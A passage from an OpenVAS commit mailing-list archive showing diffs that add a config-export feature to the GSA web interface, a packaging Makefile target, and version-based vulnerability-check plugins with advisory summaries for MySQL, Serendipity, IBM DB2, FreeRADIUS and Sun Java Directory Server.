+oval/xml/independent-system-characteristics-schema.xsd +oval/xml/ios-definitions-schema.xsd +oval/xml/ios-system-characteristics-schema.xsd +oval/xml/linux-definitions-schema.xsd +oval/xml/linux-system-characteristics-schema.xsd +oval/xml/macos-definitions-schema.xsd +oval/xml/macos-system-characteristics-schema.xsd +oval/xml/oval-common-schema.xsd +oval/xml/oval-definitions-schematron.xsl +oval/xml/oval-definitions-schema.xsd +oval/xml/oval-results-schema.xsd +oval/xml/oval-system-characteristics-schema.xsd +oval/xml/oval-variables-schema.xsd +oval/xml/pixos-definitions-schema.xsd +oval/xml/pixos-system-characteristics-schema.xsd +oval/xml/results_to_html.xsl +oval/xml/solaris-definitions-schema.xsd +oval/xml/solaris-system-characteristics-schema.xsd +oval/xml/unix-definitions-schema.xsd +oval/xml/unix-system-characteristics-schema.xsd +oval/xml/windows-definitions-schema.xsd +oval/xml/windows-system-characteristics-schema.xsd +oval/xml/xmldsig-core-schema.xsd +path.cpp +path.hpp +plugin.dtd +readme.txt +readn.c +readn.h +struct.h +testplugin/dir.cpp +testplugin/Makefile +testplugin/plugin.xml +TODO.txt +VERSION +winslad.nsi +writen.c +writen.h +xml.cpp Modified: trunk/winslad/Makefile =================================================================== --- trunk/winslad/Makefile 2010-01-04 13:48:57 UTC (rev 6299) +++ trunk/winslad/Makefile 2010-01-04 14:01:41 UTC (rev 6300) @@ -47,5 +47,14 @@ $(DOXYGEN) doc/Doxyfile_full if [ -d doc/generated/latex ]; then $(MAKE) -C doc/generated/latex; fi +dist: + version="`cat VERSION`"; \ + rm -rf winslad-$${version}* ; \ + mkdir winslad-$${version} ; \ + tar cf winslad-$${version}/x.tar `cat MANIFEST`; \ + ( cd winslad-$${version} ; tar xf x.tar ; rm -f x.tar ) ; \ + tar cf winslad-$${version}.tar winslad-$${version} ; \ + gzip -9 winslad-$${version}.tar + # Build these targets even if they seem to need no update. .PHONY: doc From scm-commit at wald.intevation.org Mon Jan 4 15:25:36 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 15:25:36 +0100 (CET) Subject: [Openvas-commits] r6301 - in trunk/gsa: . src src/html/src Message-ID: <20100104142536.C9C93861F2E9@pyrosoma.intevation.org> Author: mattm Date: 2010-01-04 15:25:35 +0100 (Mon, 04 Jan 2010) New Revision: 6301 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/gsad_omp.c trunk/gsa/src/gsad_omp.h trunk/gsa/src/html/src/omp.xsl Log: Add config exporting. * src/gsad_omp.c (export_config_omp): New function. * src/gsad_omp.h: Add header. * src/gsad.c (init_validator): Add export_config command. (exec_omp_get): Handle command export_config. * src/html/src/omp.xsl (config): Add an export button. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-04 14:01:41 UTC (rev 6300) +++ trunk/gsa/ChangeLog 2010-01-04 14:25:35 UTC (rev 6301) @@ -1,5 +1,18 @@ 2009-01-04 Matthew Mundell + Add config exporting. + + * src/gsad_omp.c (export_config_omp): New function. + + * src/gsad_omp.h: Add header. + + * src/gsad.c (init_validator): Add export_config command. + (exec_omp_get): Handle command export_config. + + * src/html/src/omp.xsl (config): Add an export button. + +2009-01-04 Matthew Mundell + * src/gsad.c (init_validator): Add email rule. (escalator_data): New function. (exec_omp_post): Check email addresses. Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-04 14:01:41 UTC (rev 6300) +++ trunk/gsa/src/gsad.c 2010-01-04 14:25:35 UTC (rev 6301) @@ -178,6 +178,7 @@ "|(edit_config)" "|(edit_config_family)" "|(edit_config_nvt)" + "|(export_config)" "|(get_agents)" "|(get_config)" "|(get_config_family)" @@ -1843,6 +1844,10 @@ return get_config_nvt_omp (credentials, name, family, oid, sort_field, sort_order, 1); + else if ((!strcmp (cmd, "export_config")) && (name != NULL)) + return export_config_omp (credentials, name, &content_type, + &content_disposition, &response_size); + else if (0 == strcmp (cmd, "get_agents") && ((name == NULL && agent_format == NULL) || (name && agent_format))) Modified: trunk/gsa/src/gsad_omp.c =================================================================== --- trunk/gsa/src/gsad_omp.c 2010-01-04 14:01:41 UTC (rev 6300) +++ trunk/gsa/src/gsad_omp.c 2010-01-04 14:25:35 UTC (rev 6301) @@ -3421,6 +3421,105 @@ } /** + * @brief Export a config. + * + * @param[in] credentials Username and password for authentication. + * @param[in] name Name of report. + * @param[out] content_type Content type return. + * @param[out] content_disposition Content dispositions return. + * @param[out] content_length Content length return. + * + * @return Config XML on success. HTML result of XSL transformation on error. + */ +char * +export_config_omp (credentials_t * credentials, const char *name, + char **content_type, char **content_disposition, + gsize *content_length) +{ + GString *xml; + entity_t entity; + entity_t config_entity; + gnutls_session_t session; + int socket; + char *content = NULL; + + *content_length = 0; + + if (manager_connect (credentials, &socket, &session)) + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting a config. " + "The config could not be delivered. " + "Diagnostics: Failure to connect to manager daemon.", + "/omp?cmd=get_status"); + + xml = g_string_new (""); + + if (name == NULL) + g_string_append (xml, GSAD_MESSAGE_INVALID_PARAM ("Export Scan Config")); + else + { + if (openvas_server_sendf (&session, + "", + name) + == -1) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting a config. " + "The config could not be delivered. " + "Diagnostics: Failure to send command to manager daemon.", + "/omp?cmd=get_status"); + } + + entity = NULL; + if (read_entity_and_text (&session, &entity, &content)) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting a config. " + "The config could not be delivered. " + "Diagnostics: Failure to receive response from manager daemon.", + "/omp?cmd=get_status"); + } + + config_entity = entity_child (entity, "config"); + if (config_entity != NULL) + { + *content_type = g_strdup ("application/xml"); + *content_disposition = g_strdup_printf ("attachment; filename=\"%s.xml\"", + name); + *content_length = strlen (content); + free_entity (entity); + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return content; + } + else + { + free (content); + free_entity (entity); + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting a config. " + "The config could not be delivered. " + "Diagnostics: Failure to receive config from manager daemon.", + "/omp?cmd=get_status"); + } + } + + g_string_append (xml, ""); + openvas_server_close (socket, session); + return xsl_transform_omp (credentials, g_string_free (xml, FALSE)); +} + +/** * @brief Delete report, get task status, XSL transform the result. * * @param[in] credentials Username and password for authentication. Modified: trunk/gsa/src/gsad_omp.h =================================================================== --- trunk/gsa/src/gsad_omp.h 2010-01-04 14:01:41 UTC (rev 6300) +++ trunk/gsa/src/gsad_omp.h 2010-01-04 14:25:35 UTC (rev 6301) @@ -106,6 +106,7 @@ char * create_config_omp (credentials_t *, char *, char *, char *, const char *); char * delete_config_omp (credentials_t *, const char *); +char * export_config_omp (credentials_t *, const char *, char **, char **, gsize *); gboolean is_omp_authenticated (gchar *, gchar *); Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-04 14:01:41 UTC (rev 6300) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-04 14:25:35 UTC (rev 6301) @@ -3700,6 +3700,11 @@ style="margin-left:3px;"/> + + Export XML + From scm-commit at wald.intevation.org Mon Jan 4 15:26:59 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 15:26:59 +0100 (CET) Subject: [Openvas-commits] r6302 - in trunk/openvas-plugins: . scripts Message-ID: <20100104142659.E64D7861F2E9@pyrosoma.intevation.org> Author: chandra Date: 2010-01-04 15:26:56 +0100 (Mon, 04 Jan 2010) New Revision: 6302 Added: trunk/openvas-plugins/scripts/secpod_mysql_bof_vuln_lin.nasl trunk/openvas-plugins/scripts/secpod_serendipity_file_upload_vuln.nasl trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_mult_vuln_win.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/secpod_freeradius_tunnel_password_dos_vuln.nasl trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_lin.nasl trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_win.nasl trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_lin.nasl trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_win.nasl trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_detect_win.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/ChangeLog 2010-01-04 14:26:56 UTC (rev 6302) @@ -1,3 +1,18 @@ +2010-01-04 Chandrashekhar B + + * scripts/secpod_mysql_bof_vuln_lin.nasl, + scripts/secpod_serendipity_file_upload_vuln.nasl, + scripts/secpod_sun_java_dir_server_mult_vuln_win.nasl: + Added new plugins. + + * scripts/secpod_ibm_udb_db2_mult_vuln_win.nasl, + scripts/secpod_sun_java_dir_server_detect_win.nasl, + scripts/secpod_freeradius_tunnel_password_dos_vuln.nasl, + scripts/secpod_ibm_db2_stmm_dos_vuln_win.nasl, + scripts/secpod_ibm_udb_db2_mult_vuln_lin.nasl, + scripts/secpod_ibm_db2_stmm_dos_vuln_lin.nasl: + Added new CVE's. + 2009-12-31 Chandrashekhar B * scripts/secpod_sql_ledger_detect.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/cve_current.txt 2010-01-04 14:26:56 UTC (rev 6302) @@ -448,3 +448,12 @@ CVE-2009-3702 SecPod svn R CVE-2009-4140 SecPod svn R CVE-2009-4418 SecPod svn R +CVE-2009-4438 SecPod svn L +CVE-2009-4439 SecPod svn L +CVE-2009-4481 SecPod svn R +CVE-2009-4412 SecPod svn R +CVE-2009-4440 SecPod svn L +CVE-2009-4441 SecPod svn L +CVE-2009-4442 SecPod svn L +CVE-2009-4443 SecPod svn L +CVE-2009-4484 SecPod svn R Modified: trunk/openvas-plugins/scripts/secpod_freeradius_tunnel_password_dos_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_freeradius_tunnel_password_dos_vuln.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_freeradius_tunnel_password_dos_vuln.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -7,6 +7,9 @@ # Authors: # Sharath S # +# Updated By: +# Antu Sanadi on 2009/12/31 #6502 +# # Copyright: # Copyright (c) 2009 SecPod, http://www.secpod.com # @@ -27,8 +30,8 @@ if(description) { script_id(900856); - script_version("$Revision: 1.0 $"); - script_cve_id("CVE-2009-3111"); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-3111", "CVE-2009-4481"); script_bugtraq_id(36263); script_name("FreeRADIUS Tunnel-Password Denial Of Service Vulnerability"); desc = " @@ -36,8 +39,10 @@ vulnerability. Vulnerability Insight: - The flaw is due to error in the 'rad_decode()' function in 'src/lib/radius.c' - which can exploited via zero-length Tunnel-Password attributes. + The flaws are due to: + - An error in the 'rad_decode()' function in 'src/lib/radius.c' which can + be exploited via zero-length Tunnel-Password attributes. + - An unspecified error that can be exploited to crash the 'radiusd' daemon. Impact: Successful exploitation will let the attacker to crash the service. @@ -58,6 +63,7 @@ ***** References: + http://secunia.com/advisories/36509 http://www.intevydis.com/blog/?p=66 http://www.openwall.com/lists/oss-security/2009/09/09/1 http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/ Property changes on: trunk/openvas-plugins/scripts/secpod_freeradius_tunnel_password_dos_vuln.nasl ___________________________________________________________________ Name: svn:keywords + Revision Modified: trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_lin.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_lin.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -7,6 +7,9 @@ # Authors: # Antu Sanadi # +# Updated By: +# Antu Sanadi on 2009/12/29 #6444 +# # Copyright: # Copyright (c) 2009 SecPod, http://www.secpod.com # @@ -27,8 +30,8 @@ if(description) { script_id(901079); - script_version("$Revision$: 1.0"); - script_cve_id("CVE-2009-4334"); + script_version("$Revision$: 1.1"); + script_cve_id("CVE-2009-4334", "CVE-2009-4438"); script_bugtraq_id(37332); script_name("IBM DB2 Self Tuning Memory Manager (STMM) DOS Vulnerability (Linux)"); desc = " @@ -36,8 +39,12 @@ vulnerability. Vulnerability Insight: - The flaw is caused due to an error in Self Tuning Memory Manager (STMM) - component when 0666 permissions is set for the STMM log file. + The flaws are due to: + - An error in Self Tuning Memory Manager (STMM) component when 0666 + permissions for the STMM log file is used. + - An error in Query Compiler, Rewrite, and Optimizer component does not enforce + privilege requirements for access to a 'sequence' or 'global-variable' object, + which allows remote users to make use of data via unspecified vectors. Impact: Successful exploitation will let the attacker to cause a denial of service Modified: trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_win.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_ibm_db2_stmm_dos_vuln_win.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -7,6 +7,9 @@ # Authors: # Antu Sanadi # +# Updated By: +# Antu Sanadi on 2009/12/29 #6444 +# # Copyright: # Copyright (c) 2009 SecPod, http://www.secpod.com # @@ -27,8 +30,8 @@ if(description) { script_id(901078); - script_version("$Revision$: 1.0"); - script_cve_id("CVE-2009-4334"); + script_version("$Revision$: 1.1"); + script_cve_id("CVE-2009-4334", "CVE-2009-4438"); script_bugtraq_id(37332); script_name("IBM DB2 Self Tuning Memory Manager (STMM) DOS Vulnerability (Win)"); desc = " @@ -36,8 +39,12 @@ vulnerability. Vulnerability Insight: - The flaw is caused due to an error in Self Tuning Memory Manager (STMM) - component when 0666 permissions is set for the STMM log file. + The flaws are due to: + - An error in Self Tuning Memory Manager (STMM) component when 0666 + permissions for the STMM log file is used. + - An error in Query Compiler, Rewrite, and Optimizer component does not enforce + privilege requirements for access to a 'sequence' or 'global-variable' object, + which allows remote users to make use of data via unspecified vectors. Impact: Successful exploitation will let the attacker to cause a denial of service Modified: trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_lin.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_lin.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -7,6 +7,9 @@ # Authors: # Antu Sanadi # +# Updated By: +# Antu Sanadi on 2009/12/29 #6444 +# # Copyright: # Copyright (c) 2009 SecPod, http://www.secpod.com # @@ -27,9 +30,9 @@ if(description) { script_id(901083); - script_version("$Revision$: 1.0"); + script_version("$Revision$: 1.1"); script_cve_id("CVE-2009-4328", "CVE-2009-4329", "CVE-2009-4330", "CVE-2009-4333", - "CVE-2009-4335"); + "CVE-2009-4335", "CVE-2009-4439"); script_bugtraq_id(37332); script_name("IBM DB2 UDB Multiple Unspecified Vulnerabilities (Linux)"); desc = " @@ -41,19 +44,22 @@ - An unspecified error in the Engine Utilities component, causes segmentation fault by modifying the db2ra data stream sent in a request from the load utility. - - An unspecified error in 'db2licm' within the Engine Utilities component,it + - An unspecified error in 'db2licm' within the Engine Utilities component it has unknown impact and local attack vectors. - - An unspecified error in the DRDA Services component, causes the server trap + - An unspecified error in the DRDA Services componenta, causes the server trap by calling a SQL stored procedure in unknown circumstances. - An error in relational data services component, allows attackers to obtain the password argument from the SET ENCRYPTION PASSWORD statement via vectors involving the GET SNAPSHOT FOR DYNAMIC SQL command. - Multiple unspecified errors in bundled stored procedures in the Spatial Extender component, have unknown impact and remote attack vectors. + - An unspecified vulnerability in the Query Compiler, Rewrite, and Optimizer + component, allows to cause a denial of service (instance crash) by compiling + a SQL query Impact: Successful exploitation will let the attacker to bypass security restrictions, - cause a denial of service and some are having unknown impact. + cause a denial of service. Impact Level: System/Application Modified: trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_win.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_ibm_udb_db2_mult_vuln_win.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -7,6 +7,9 @@ # Authors: # Antu Sanadi # +# Updated By: +# Antu Sanadi on 2009/12/29 #6444 +# # Copyright: # Copyright (c) 2009 SecPod, http://www.secpod.com # @@ -27,9 +30,9 @@ if(description) { script_id(901082); - script_version("$Revision$: 1.0"); + script_version("$Revision$: 1.1"); script_cve_id("CVE-2009-4328", "CVE-2009-4329", "CVE-2009-4330", "CVE-2009-4333", - "CVE-2009-4335"); + "CVE-2009-4335", "CVE-2009-4439"); script_bugtraq_id(37332); script_name("IBM DB2 UDB Multiple Unspecified Vulnerabilities (Windows)"); desc = " @@ -43,22 +46,25 @@ utility. - An unspecified error in 'db2licm' within the Engine Utilities component it has unknown impact and local attack vectors. - - An unspecified error in the DRDA Services component, causes the server trap + - An unspecified error in the DRDA Services componenta, causes the server trap by calling a SQL stored procedure in unknown circumstances. - An error in relational data services component, allows attackers to obtain the password argument from the SET ENCRYPTION PASSWORD statement via vectors involving the GET SNAPSHOT FOR DYNAMIC SQL command. - Multiple unspecified errors in bundled stored procedures in the Spatial Extender component, have unknown impact and remote attack vectors. + - An unspecified vulnerability in the Query Compiler, Rewrite, and Optimizer + component, allows to cause a denial of service (instance crash) by compiling + a SQL query. Impact: Successful exploitation will let the attacker to bypass security restrictions, - cause a denial of service and some are having unknown impact. + cause a denial of service. Impact Level: System/Application Affected Software/OS: - IBM DB2 version 9.5 prior to Fixpak 5. + IBM DB2 version 9.5 prior to Fixpak 5 Fix: Update IBM DB2 9.5 Fixpak 5, Added: trunk/openvas-plugins/scripts/secpod_mysql_bof_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_mysql_bof_vuln_lin.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_mysql_bof_vuln_lin.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -0,0 +1,96 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_mysql_bof_vuln_lin.nasl 6504 2009-12-31 23:29:17Z dec $ +# +# MySQL Server Buffer Overflow Vulnerability (Linux) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(901093); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4484"); + script_name("MySQL Server Buffer Overflow Vulnerability (Linux)"); + desc = " + Overview: The host is running MySQL and is prone to Buffer overflow + Vulnerability + + Vulnerability Insight: + The flaw is due to an error in application that allows remote attackers to + execute arbitrary code via unspecified vectors + + Impact: + Successful exploitation could allow attackers to execute arbitrary code. + + Impact Level: Application + + Affected Software/OS: + MySQL Version 5.0.51a On Linux + + Fix: No solution/patch is available as on 31st December, 2009. Information + regarding this issue will be updated once the solution details are available + For Updates Refer, http://dev.mysql.com/downloads + + References: + http://intevydis.com/vd-list.shtml + http://www.intevydis.com/blog/?p=57 + + CVSS Score: + CVSS Base Score : 6.8 (AV:N/AC:M/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.1 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of MySQL"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Databases"); + script_dependencies("mysql_version.nasl"); + script_require_ports("Services/mysql", 3306); + exit(0); +} + + +include("misc_func.inc"); +include("version_func.inc"); + +sqlPort = get_kb_item("Services/mysql"); +if(!sqlPort){ + sqlPort = 3306; +} + +if(!get_port_state(sqlPort)){ + exit(0); +} + +mysqlVer = get_mysql_version(port:sqlPort); +if(isnull(mysqlVer)){ + exit(0); +} + +mysqlVer = eregmatch(pattern:"([0-9.a-z]+)", string:mysqlVer); +if(!isnull(mysqlVer[1])) +{ + if(version_is_equal(version:mysqlVer[1], test_version:"5.0.51a")){ + security_hole(sqlPort); + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_mysql_bof_vuln_lin.nasl ___________________________________________________________________ Name: svn:executable + * Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/secpod_serendipity_file_upload_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_serendipity_file_upload_vuln.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_serendipity_file_upload_vuln.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -0,0 +1,95 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_serendipity_file_upload_vuln.nasl 6412 2009-12-31 16:40:29Z dec $ +# +# Serendipity File Extension Processing Arbitrary File Upload Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(901091); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4412"); + script_name("Serendipity File Extension Processing Arbitrary File Upload Vulnerability"); + desc = " + Overview: This host is running Serendipity and is prone to arbitrary file upload + vulnerability. + + Vulnerability Insight: + The flaw is due to an input validation error in the file upload functionality + when processing a file with a filename containing multiple file extensions. + + Impact: + Successful exploitation will let the attacker to upload PHP scripts and execute + arbitrary commands on a web server with a specific configuration. + + Impact Level: Application + + Affected Software/OS: + Serendipity version prior to 1.5 on all platforms. + + Fix: Upgrade to Serendipity version 1.5 or later. + For Updates Refer, http://www.s9y.org/12.html + + References: + http://secunia.com/advisories/37830 + http://xforce.iss.net/xforce/xfdb/54985 + http://www.vupen.com/english/advisories/2009/3626 + http://www.openwall.com/lists/oss-security/2009/12/21/1 + + CVSS Score: + CVSS Base Score : 6.0 (AV:N/AC:M/Au:SI/C:P/I:P/A:P) + CVSS Temporal Score : 4.4 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of Serendipity"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Web application abuses"); + script_dependencies("serendipity_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +serPort = get_http_port(default:80); +if(!serPort){ + exit(0); +} + +serVer = get_kb_item("www/"+ serPort + "/serendipity"); +if(!serVer){ + exit(0); +} + +ver = eregmatch(pattern:"^(.+) under (/.*)$", string:serVer); +if(ver[1] != NULL) +{ + # Check for Serendipity version < 1.5 + if(version_is_less(version:ver[1], test_version:"1.5")){ + security_warning(serPort); + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_serendipity_file_upload_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Name: svn:keywords + Revision Modified: trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_detect_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_detect_win.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_detect_win.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -7,6 +7,9 @@ # Authors: # Sujit Ghosal # +# Updated to Detect 6 Series Versions +# - By Sharath S On 2009-12-31 #6445 +# # Copyright: # Copyright (c) 2009 SecPod, http://www.secpod.com # @@ -27,10 +30,9 @@ if(description) { script_id(900492); - script_version("$Revision: 1.0 $"); + script_version("$Revision$: 1.1"); script_name("Sun Java Directory Server Version Detection (Win)"); desc = " - Overview: This script detects the version of Directory Server and sets the reuslt in KB. @@ -55,30 +57,40 @@ exit(0); } -key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Directory Server\"; -if(!registry_key_exists(key:key)){ - exit(0); +key1 = "SOFTWARE\Sun Microsystems\DirectoryServer\"; +key2 = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Directory Server\"; + +if(registry_key_exists(key:key1)) +{ + foreach item (registry_enum_keys(key:key1)) + { + ver = eregmatch(pattern:"([0-9]\.[0-9.]+)", string:item); + if(ver[1] != NULL){ + set_kb_item(name:"Sun/JavaDirServer/Win/Ver", value:ver[1]); + } + } } -appregCheck = registry_get_sz(key:key, item:"DisplayName"); -if("Directory Server" >< appregCheck) +else if(registry_key_exists(key:key2)) { - infPath = registry_get_sz(key:key, item:"UninstallString"); - infPath = ereg_replace(pattern:'"', string:infPath, replace:""); - infFile = infPath - "uninstall_dirserver.exe" + "setup\slapd\slapd.inf"; + appregCheck = registry_get_sz(key:key2, item:"DisplayName"); + if("Directory Server" >< appregCheck) + { + infPath = registry_get_sz(key:key2, item:"UninstallString"); + infPath = ereg_replace(pattern:'"', string:infPath, replace:""); + infFile = infPath - "uninstall_dirserver.exe" + "setup\slapd\slapd.inf"; - share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:infFile); - file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:infFile); + share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:infFile); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:infFile); - infContent = read_file(share:share, file:file, offset:0, count:256); - if("Directory Server" >< infContent) - { - appVer = eregmatch(pattern:"System Directory Server ([0-9]\.[0-9.]+)", - string:infContent); - if(appVer[1] != NULL) + infContent = read_file(share:share, file:file, offset:0, count:256); + if("Directory Server" >< infContent) { - set_kb_item(name:"Sun/JavaDirServer/Win/Ver", value:appVer[1]); + appVer = eregmatch(pattern:"System Directory Server ([0-9]\.[0-9.]+)", + string:infContent); + if(appVer[1] != NULL){ + set_kb_item(name:"Sun/JavaDirServer/Win/Ver", value:appVer[1]); + } } } - exit(0); } Property changes on: trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_detect_win.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_mult_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_mult_vuln_win.nasl 2010-01-04 14:25:35 UTC (rev 6301) +++ trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_mult_vuln_win.nasl 2010-01-04 14:26:56 UTC (rev 6302) @@ -0,0 +1,105 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_sun_java_dir_server_mult_vuln_win.nasl 6445 2009-12-31 11:24:29Z dec $ +# +# Sun Java System DSEE Multiple Vulnerabilities (Win) +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(902011); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4440", "CVE-2009-4441", "CVE-2009-4442", "CVE-2009-4443"); + script_bugtraq_id(37481); + script_name("Sun Java System DSEE Multiple Vulnerabilities (Win)"); + desc = " + Overview: This host is running Sun Java System Directory Server Enterprise + Edition (DSEE) and is prone to multiple vulnerabilities. + + Vulnerability Insight: + - An error in Directory Proxy Server may cause a client operation to + temporarily run with another client's privileges. + - An error in Directory Proxy Server can be exploited via specially crafted + packets to cause the service to stop responding to new client connections. + - An error in Directory Proxy Server can be exploited via a specially crafted + 'psearch' client to exhaust available CPU resources, preventing the server + from sending results to other 'psearch' clients. + + Impact: + Successful exploitation will let the attacker to gain knowledge of potentially + sensitive information or cause a Denial of Service. + + Impact Level: Application + + Affected Software/OS: + Sun Java System DSEE version 6.0 through 6.3.1 on Windows. + + Fix: Apply patch 141958-01 or later for Sun Java System DSEE version 6.3.1 + 